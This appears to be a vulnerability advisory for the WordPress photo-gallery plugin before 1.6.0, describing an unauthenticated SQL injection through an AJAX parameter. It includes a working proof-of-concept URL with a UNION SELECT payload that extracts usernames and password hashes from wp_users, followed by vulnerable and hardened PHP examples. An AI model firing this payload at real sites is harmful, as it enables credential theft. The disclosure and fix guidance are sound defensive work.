The plugin does not validate and escape the `bwg_tag_id_bwg_thumbnails_0` parameter before using it in a SQL statement via the `bwg_frontend_data` AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection.

Proof of concept:

`https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(user_login,%200x2c,%20user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users%20--%20g`
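The root cause described above is a request array joined straight into a SQL `IN (...)` clause. The following PHP is an added illustration written for this page, not the plugin's own code: it contrasts that vulnerable pattern with a hardened handler that casts each value to a positive integer and binds every value through `$wpdb->prepare()`. The table name `example_image_tag` and the function names are placeholders; only the parameter name comes from the advisory.

```php
<?php
// Added illustration, not the plugin's code. $wpdb is WordPress's database object;
// the table name is a placeholder, not the plugin's real schema.

// Vulnerable pattern: array values from the request are concatenated into SQL,
// so any non-numeric value reaches the database unchanged.
function example_tags_query_vulnerable( $wpdb, array $request ) {
    $raw = isset( $request['bwg_tag_id_bwg_thumbnails_0'] )
        ? (array) $request['bwg_tag_id_bwg_thumbnails_0']
        : array();
    $in = implode( ',', $raw ); // request-controlled string, never validated
    return "SELECT image_id FROM {$wpdb->prefix}example_image_tag WHERE tag_id IN ({$in})";
}

// Hardened pattern: enforce the expected type (positive integers), refuse an
// empty list instead of emitting "IN ()", and bind each value with %d.
function example_tags_query_hardened( $wpdb, array $request ) {
    $raw = isset( $request['bwg_tag_id_bwg_thumbnails_0'] )
        ? (array) $request['bwg_tag_id_bwg_thumbnails_0']
        : array();

    // intval() turns any injected string into 0, which the filter then drops.
    $tag_ids = array_values( array_filter(
        array_map( 'intval', $raw ),
        function ( $id ) { return $id > 0; }
    ) );

    if ( empty( $tag_ids ) ) {
        return null; // caller treats null as "no rows", no query is run
    }

    // One %d placeholder per value; prepare() escapes and substitutes them.
    $placeholders = implode( ',', array_fill( 0, count( $tag_ids ), '%d' ) );
    return $wpdb->prepare(
        "SELECT image_id FROM {$wpdb->prefix}example_image_tag WHERE tag_id IN ({$placeholders})",
        $tag_ids
    );
}

// Usage inside an AJAX callback (hypothetical):
//   $sql = example_tags_query_hardened( $wpdb, $_REQUEST );
//   $rows = $sql ? $wpdb->get_col( $sql ) : array();
```

Passing the `$tag_ids` array as the second argument to `$wpdb->prepare()` is supported by WordPress (a single array argument is expanded as the placeholder values), which is what makes a variable-length `IN` list safe to build this way. The integer cast is the actual control: after it, nothing in the list can change the structure of the statement.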
| CPE | Name | Operator | Version |
|---|---|---|---|
| | photo-gallery | lt | 1.6.0 |